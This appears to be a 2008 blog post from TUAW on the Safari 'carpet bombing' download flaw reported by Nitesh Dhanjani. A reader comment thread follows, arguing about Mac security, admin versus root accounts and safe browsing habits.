Safari 'carpet bombing' exploit could be serious
A zero-day vulnerability in Safari that could litter a user's desktop (or downloads folder) with arbitrary files is a serious security flaw, argues ZDNet, and not a mere "annoyance" as Apple claims. In theory, a user must click a link to visit a malicious website that can begin downloading arbitrary files (including applications) to the user's computer without their permission. The problem affects both the Windows and Mac versions of Safari.
Researcher Nitesh Dhanjani reported the flaw to Apple, which promised to patch it in a future release of Safari. ZDNet and StopBadware.org contend, however, that a patch should be released immediately.
It's old advice, but it bears repeating: be careful of the links you click, and know where they go before you click them.
Share
A zero-day vulnerability in Safari that could litter a user's desktop (or downloads folder) with arbitrary files is a serious security...
Add a Comment
If everyone is so worried then they could just download firefox or opera........
June 01 2008 at 7:46 PM Report abuse Permalink rate up rate down ReplyAverage Mac users are not dumb enough to give admin access to apps they don't know WTF they do.
Our operating system is deceptively simple. That by no means connotes that it engenders an OS that is prosaic in its
security design.
Lets not forget that this is unix we are talking about. What ever Apple has do to make it look prettier it's still friggin *nix.
Windows is still Dos... Yeah, I went there. That's precisely why it still sucks.
Furthermore kiddies, your little admin account aint root. You get that? All you morons, including the author apparently don't now enough about Mac security to take into account that root has to be enabled. You can't do it with your "user name and password"
Guess what humans? The admin account is not system- root is. Admins, can't hose the system completely. Admin is not the god account.
So, knowing this especially if one does not know the system that well; why on Earth would one just go ahead and let an unknown do what it wants.
You see, old school Mac users aren't falling for it. We never did. New Mac users coming from Winblows really aren't going for it because of the bad taste micro$atan left in them. Linux users coming on board are just like Mac users - have brains.
Who is left? Yeah, that's why Apple is not putting this on the high priority.
Our lesson for today n00bs is stop the FUD and just admit that OSX is the superior OS. To what? To all of them.
One more thing. You might want to Google my name and read up before any of you decide to match wits with me. I'm right about all this. The discussion is over.
...end of line
Yes the old school Mac Users and the experienced Mac Users are unlikely to click on Programs that magically appear on the Desktop. But I bet that many new users (whether or not they have used Windows before) will! Apple is marketing Mac OS X not only to the experienced power user but also to the average inexperienced consumer.
And yes if there are no "root escalation exploits" available and known to the hacker then yes running a mailcious program that magically appears in Mac OS X Desktop will not be as dangerous as a malicious program launched under root (which is rare under Mac OS X).
But there have been "root escalation exploits" in Linux, BSD and Mac OS X in the past which do get eventually patched (if Apple and the Linux devs knows about them). You don't need to have the root account enabled or setup with a password for these exploits to work. If the program initially run under a regular User Account takes advantage of a "root escalation exploit", it will run as root and can do anything to your system.
No commonly available desktop OS is perfectly secure even if you don't run as root or an admin account.
But you are MORE secure if you never run as root or under an Admin account. Most of the previous really dangerous Mac OS X exploits were only available to hackers if the user was running an Admin Account.
Don't surf the net with a Admin Account and especially do not surf under root. And do not click on links in Emails from people you do not know. I just wish more users would do that.
It just doesn't work - at least the way they discribe it. If you have multiple cgi's in iframes safari just show the text access not available... so cgi's don't download automatically. But Safari loads like every other browser specific files like .dmg's or .zip's (or server side pushed downloads) - so what's the big deal? That works with firefox and all other browsers too. Don't get it.
May 31 2008 at 3:58 AM Report abuse Permalink rate up rate down ReplyWasn't this part of a two part problem from a little while ago?
The second part had to do with the fact that safari does not notify the user when a hyperlink executes local code.
So, the user could then click on a link that executes the code that was just downloaded.
I would assume that mac users would get the downloaded application dialog; however, would windows users get something similar?
Most browsers execute code when you visit a website without any user interaction. e.g. Most browsers (like Safari and Firefox) are configured to execute Javascript automatically. If there is a flaw, you could be "pwned".
And yes, normally when you download a file using Windows or the Mac you are presented with a download dialog box. But whether you see it when you visit a malicious website depends on the exploit being used by the website. If your are vulnerable to an exploit that allows the website to download files behind your back and the website is using that exploit, well you won't see a download dialog box!
In the end, all I can say is that, after more than 20 years of using a Mac every single day, I have never seen a single Mac exploit of any kind--not one. Nor have any of the hundreds of other Mac users I have helped in all these years. I can't be the only one! I realize that Windows users find it comforting to tell themselves that Macs are just as vulnerable as PC's, but it simply isn't true.
May 30 2008 at 4:18 PM Report abuse Permalink rate up rate down ReplyWell, the main reason why you have not seen many exploits on the Mac relates to profit. Most exploits these days are being used to make $$. It is not worth it for malware developers to make $$ off exploits in the Mac. Since there are so many more Windows PC's, it makes more sense to target that machine and develop malware for Windows PC's. But since the market share for the Mac has gone way up in recent months that may change.
The main vector for an exploit are vulnerabilities in web browsers and multimedia players (eg Flash, Realplayer, quicktime). Most browsers (including Firefox and Safari) are configured to download and RUN code automatically (e.g. javascript) and plugins automatically (eg Flash which then downloads and runs Flash content which could be malicious) without any user intervention. If there is a vulnerability in the browser (and there has been even on the Mac), one can "pwn" or take over your computer if you just visit a web site. (e.g. The early jailbreak software used a flaw in Safari on the iPhone to run jailbreak software. You just had to visit the jailbreakme website with your iPhone to jailbreak your phone!)
An awful thought but that is the truth. When MS, Apple and Linux devs are informed of these exploits, they get patched. My big complaint is Apple is one of the slowest to patch exploits.
P.S. Even my 91-year-old client (who frequently clicks links he shouldn't be clicking) has the good sense to call me when he sees a new icon he doesn't recognize on his Desktop. It's not that it's impossible for a malicious program to do damage on a Mac; it's that, before this can happen, the user has to make a series of really stupid mistakes that no one with half (or even a quarter) of a brain would make.
May 30 2008 at 1:05 PM Report abuse Permalink rate up rate down Reply"Even if the program does NOT require administrative rights, it can do a LOT of damage (like deleting all the files, photos and music in your home folder!)." --RobK
What are you smoking, dude? What you have just said is sheer nonsense. Programs can do nothing unless the user (after being dumb enough to visit a malicious website to begin with) actually LAUNCHES an offending program. There is no such thing as a program that downloads itself, then launches itself, on a Mac. Not to mention the fact that, if you are using Safari, it warns you when you attempt to launch ANY program that was originally downloaded from the internet. There is no foolproof protection against terminal stupidity.
Of course the user must click on the application to take advantage of this particular exploit. But many users are frankly stupid.
The worst exploits download code and automatically run them. They do exist. Look at the Safari exploit that was used to take over a MacBook Air running Leopard during a $10,000 pwn-to-own contest. (see http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9078399&source=rss_news10 )
All the user had to do it click a link in an EMAIL which took safari to a website containing the code. The code was run AUTOMATICALLY and the Mac was taken over. The user only had to click a link in an email or visit this malicious website. Nothing more.
Get your head out of dreamland. Macs are no different than Windows PC's or Linux boxes. If there is an exploit that can allows automatic "arbitary code execution", you could be in trouble.
The real solution is a change in user behaviour. Do NOT click on links in EMAIL especially from those you do not know. etc.
so, suppose you end up with an icon that says My C0mputer on an XP machine and then, wanting to access that area you click on it without much thinking: My C0mputer.exe is executed and does whatever it wants. That wouldn't be a minor annoyance.
May 30 2008 at 9:20 AM Report abuse Permalink rate up rate down ReplyIf you go to execute one of these files it still pops up that standard warning "This file came from a website. Are you really sure you want to run this FREE PR0N HOTTIE HOTTIE YOUNG TEEN FARM SEX viewer, you dumbass." (paraphrased ;) ) along with the link to the website, right? If so I'd still class that as nuisance, the worst it is is a waste of my bandwidth and HD space [till I get around to my periodic cleaning of the Download folder].
May 30 2008 at 6:55 AM Report abuse Permalink rate up rate down ReplyThe author's characterization of this as "arbitrary desktop write access" is pure nonsense.
One of the reasons I prefer Safari is for the way it handles downloads. And I, like most people, configure Firefox to automatically download known files (like .zip files) as well. Therefore, an option to prompt before download simply doesn't solve anything.
Stealth download is a problem that is been around as long as web browsers have been around. It cannot be handled at the browser level, which is why Microsoft and Apple now handle it at the OS level.
There are endless ways a web site can be annoying to the point that you must quit your browser. "Carpet Bombing" is just another of those annoyances, and it affects *all* browsers. What's more annoying: a download folder full of files, or an endless parade of download confirmation prompts that would require you to force-quit your browser?
Hot Apps on TUAW
Deals of the Day
more deals- Refurb Apple MacBook Air Laptops: 12" 64GB SSD for $699 + free shipping
- JVC Motion Sensing Clock Radio with Dual iPod Docks for $55 + free shipping
- Apple iPhone Headset with Mic for $4 + $2 s&h
- miFrame Picture Frame Dock for iPad for $64 + $8 s&h
- Refurb Apple iPod nano 8GB MP3 Player for $99 + free shipping, 16GB for $119
- Hannspree Apple-Shaped 28" 1080p LCD HDTV for $270 + free shipping
Software Updates
more updates- EFI Firmware Update brings Lion Internet Recovery to 2010-model Macs
- OS X Lion 10.7.3 released with Safari 5.1.3, Wi-Fi bug fix
- Aperture updated to 3.2.2, addresses Photo Stream issue
- Apple updates Keynote to address Lion issues
- Google Search app gets new look on iPad
- Apple releases Apple TV Software Update 4.4.3
Featured Stories
more stories
Popular Stories
TUAW (or The Unofficial Apple Weblog) is a website devoted to tips, reviews, news, analysis and opinion on everything Apple.
22 Comments